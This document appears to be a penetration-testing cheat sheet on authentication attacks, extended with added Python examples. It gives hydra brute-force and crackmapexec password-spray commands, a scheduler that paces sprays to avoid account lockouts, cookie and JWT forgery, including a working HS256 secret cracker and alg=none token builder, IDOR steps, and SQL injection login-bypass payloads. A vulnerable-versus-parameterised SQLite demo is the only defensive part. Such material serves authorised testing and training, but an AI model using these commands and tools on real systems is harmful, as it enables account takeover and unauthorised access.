AUTHENTICATION ATTACKS

Default credentials

Try known defaults first — Vendor defaults and the usual admin pairs, before any brute force

admin:admin, admin:password, root:root
Google: '<application> default credentials' (vendor docs and install guides usually list them)
Example Output
admin:admin -> 'Login successful'
OR: admin:password -> 'Welcome, Administrator'
(Always try these FIRST before brute forcing: a handful of attempts costs nothing and rarely trips a lockout)

Brute force login

HTTP form brute force — Copy the exact form field names and the failure string from a real request in Burp

hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid'
(F= marks a failed login by a string in the response; use S= with a success string instead when the failure text varies. -l is one user, -L takes a user list)
Example Output (same tool, POP3 module instead of the form)
hydra -l admin -P rockyou.txt 10.10.10.5 pop3
[110][pop3] login: admin password: welcome1
(Crack mail credentials)

Password spray

One password, many users — One attempt per user per round stays under the lockout threshold

crackmapexec smb $IP -u users.txt -p 'Password1' --continue-on-success
(Check the policy first with crackmapexec smb $IP -u <user> -p <pass> --pass-pol, then space rounds by the observation window)
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p 'Password1' --continue-on-success
[-] corp\admin:Password1
[-] corp\john:Password1
[+] corp\jane:Password1
(One hit across many users; without --continue-on-success the run stops at the first valid login)
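Added example, not from the original page: a small helper that splits a password list into spray rounds so no account takes more failed attempts inside one observation window than the lockout threshold allows, plus a parser that pulls the [+] lines out of crackmapexec-style output. The policy numbers, the password list and the sample output are constructed for the demo.

```python
# Added example, not from the original page: schedule a spray so that no account
# takes more failed attempts inside one observation window than the lockout
# threshold allows, and pull the successes out of crackmapexec-style output.
# The policy numbers, password list and sample output below are constructed.
import re

def spray_plan(passwords, lockout_threshold, observation_window_min, safety_margin=1):
    """Split passwords into rounds; each round tries one password per user.

    A user may take at most (lockout_threshold - safety_margin) attempts per
    observation window, so that many passwords go in one round and the next
    round starts one window later. lockout_threshold == 0 means no lockout
    policy, so everything goes in a single round.
    Returns [(start_offset_minutes, [passwords...]), ...].
    """
    passwords = list(passwords)
    if lockout_threshold == 0:
        return [(0, passwords)]
    per_round = lockout_threshold - safety_margin
    if per_round < 1:
        raise ValueError("threshold too low to spray without locking accounts")
    rounds = []
    for i in range(0, len(passwords), per_round):
        rounds.append((len(rounds) * observation_window_min, passwords[i:i + per_round]))
    return rounds

# Lines like "[+] corp\jane:Password1" mark a valid login in crackmapexec output;
# a "(Pwn3d!)" suffix on some lines means the account is a local admin on that host.
HIT_RE = re.compile(r"\[\+\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<password>\S+)")

def parse_hits(output):
    """Return (domain, user, password) for every [+] line in cme-style output."""
    return [m.group("domain", "user", "password")
            for line in output.splitlines()
            if (m := HIT_RE.search(line))]

# Constructed output in the shape crackmapexec prints (not a real capture).
SAMPLE_OUTPUT = """\
SMB  10.10.10.5  445  DC01  [-] corp\\admin:Password1 STATUS_LOGON_FAILURE
SMB  10.10.10.5  445  DC01  [-] corp\\john:Password1 STATUS_LOGON_FAILURE
SMB  10.10.10.5  445  DC01  [+] corp\\jane:Password1
SMB  10.10.10.5  445  DC01  [+] corp\\svc_backup:Password1 (Pwn3d!)
"""

if __name__ == "__main__":
    # Hypothetical policy: 5 bad attempts lock the account, counter resets after 30 min.
    plan = spray_plan(["Password1", "Welcome1", "Summer2024!", "Company123", "Spring2024!"], 5, 30)
    for start, batch in plan:
        print(f"t+{start:>3} min: {batch}")
    for domain, user, password in parse_hits(SAMPLE_OUTPUT):
        print(f"valid: {domain}\\{user}:{password}")
```

The safety margin of one attempt below the threshold leaves room for a user's own typo in the same window; raise it if the target logs attempts you cannot see (VPN, OWA and SMB often share the same counter).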

Session hijacking

JWT, base64 encoded tokens — Weak session management

Check cookies for session tokens, try to decode/forge
Example Output (plain base64 cookie, no signature)
Cookie: session=eyJhZG1pbiI6ZmFsc2V9
base64 decode: {"admin":false}
Change to: {"admin":true}
base64 encode: eyJhZG1pbiI6dHJ1ZX0=
Set cookie and refresh -> Admin access!
(A JWT is three base64url parts, header.payload.signature; the payload decodes the same way, but the edit only sticks if the server accepts alg=none, the HS256 secret is guessable, or the signature is never checked)
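Added example, not from the original page, covering the signed case the cookie above does not: read a JWT's header and payload without verifying it, recover a weak HS256 secret from a small wordlist offline, re-sign a forged payload, and build the alg=none variant. The secret, the claims and the wordlist are constructed for the demo; only the standard library is used.

```python
# Added example, not from the original page: read a JWT's header and payload
# without verifying it, recover a weak HS256 secret from a small wordlist, and
# re-sign a forged payload. The secret, the claims and the wordlist are
# constructed for the demo; the only dependencies are the standard library.
import base64
import hashlib
import hmac
import json

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))  # restore stripped padding

def jwt_sign_hs256(payload: dict, secret: bytes, header=None) -> str:
    header = header or {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def jwt_decode_unverified(token: str):
    """Header and payload are only base64url, so anyone holding the token can read them."""
    h, p, _ = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))

def jwt_verify_hs256(token: str, secret: bytes) -> bool:
    """What a correct server does: recompute the MAC over header.payload and compare."""
    h, p, s = token.split(".")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))

def crack_hs256_secret(token: str, wordlist):
    """Offline dictionary attack: the token itself is the oracle, no requests to the target."""
    for candidate in wordlist:
        if jwt_verify_hs256(token, candidate.encode()):
            return candidate
    return None

def forge_with_secret(token: str, secret: bytes, **claims) -> str:
    """Edit claims and re-sign; verifies cleanly once the secret is known."""
    header, payload = jwt_decode_unverified(token)
    payload.update(claims)
    return jwt_sign_hs256(payload, secret, header)

def forge_alg_none(token: str, **claims) -> str:
    """alg=none variant: empty signature, accepted only by a server that trusts
    the alg field inside the token instead of its own configuration."""
    _, payload = jwt_decode_unverified(token)
    payload.update(claims)
    return (b64url_encode(b'{"alg":"none","typ":"JWT"}')
            + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()) + ".")

# Constructed demo: a server that signs with a guessable secret.
SECRET = b"secret123"
WORDLIST = ["password", "changeme", "secret", "jwtsecret", "secret123"]
TOKEN = jwt_sign_hs256({"sub": "bob", "admin": False}, SECRET)

if __name__ == "__main__":
    print("claims as sent:", jwt_decode_unverified(TOKEN)[1])
    found = crack_hs256_secret(TOKEN, WORDLIST)
    print("recovered secret:", found)
    forged = forge_with_secret(TOKEN, found.encode(), admin=True)
    print("forged token verifies:", jwt_verify_hs256(forged, SECRET))
    print("alg=none token verifies under HS256:",
          jwt_verify_hs256(forge_alg_none(TOKEN, admin=True), SECRET))
```

The cracking step is the one to try first on a real engagement: it is silent, and a secret that falls to rockyou gives you a valid token for any user and any claim set the server trusts.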

Registration / password reset

Create test@test.com — Sometimes leads to admin access

Register a new account, then look for IDOR or privilege escalation from the authenticated side
Example Output
Register: test@test.com
Login -> see profile page
Change URL: /profile?id=1 (was id=5)
Now viewing admin's profile = IDOR
OR: Reset admin password via a predictable, reused or unvalidated reset token

SQL injection on login

Bypass authentication — Classic SQLi login bypass

admin' OR 1=1-- -
admin'-- -
Example Output
Username: admin'-- -
Password: anything

Result: Logged in as admin
(Authentication bypassed via SQLi. admin'-- - comments out the password check; OR 1=1 matches every row and usually logs you in as the first user in the table, which may not be admin. The space and extra dash after -- keep the comment valid in MySQL even if the app trims trailing whitespace)
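Added example, not from the original page: the login query written the vulnerable way (user input formatted into the SQL text) next to the parameterised fix, run against an in-memory SQLite table so both payloads above can be tried offline. The users and passwords are constructed.

```python
# Added example, not from the original page: the login query written the
# vulnerable way (string formatting) next to the parameterised fix, run against
# an in-memory SQLite table. The users and passwords are constructed.
import sqlite3

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext passwords only to keep the demo short; never store them this way.
    # alice is inserted first on purpose, so OR 1=1 lands on her, not on admin.
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "Summer2024!"), ("admin", "Xk9#pQ2v!L")])
    return conn

def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text, so a quote closes the string
    literal and -- comments out the rest of the WHERE clause."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_fixed(conn, username, password):
    """Bound parameters: the driver sends the values separately from the SQL,
    so a quote in the input is just a character in the username."""
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    conn = make_db()
    for payload in ["admin'-- -", "admin' OR 1=1-- -"]:
        print(f"{payload!r:22} vulnerable -> {login_vulnerable(conn, payload, 'anything')!r:8}"
              f" fixed -> {login_fixed(conn, payload, 'anything')!r}")
```

Run it and the two payloads behave exactly as the cheat sheet says: the comment payload returns admin, the OR 1=1 payload returns the first row (alice), and the parameterised version returns nothing for either.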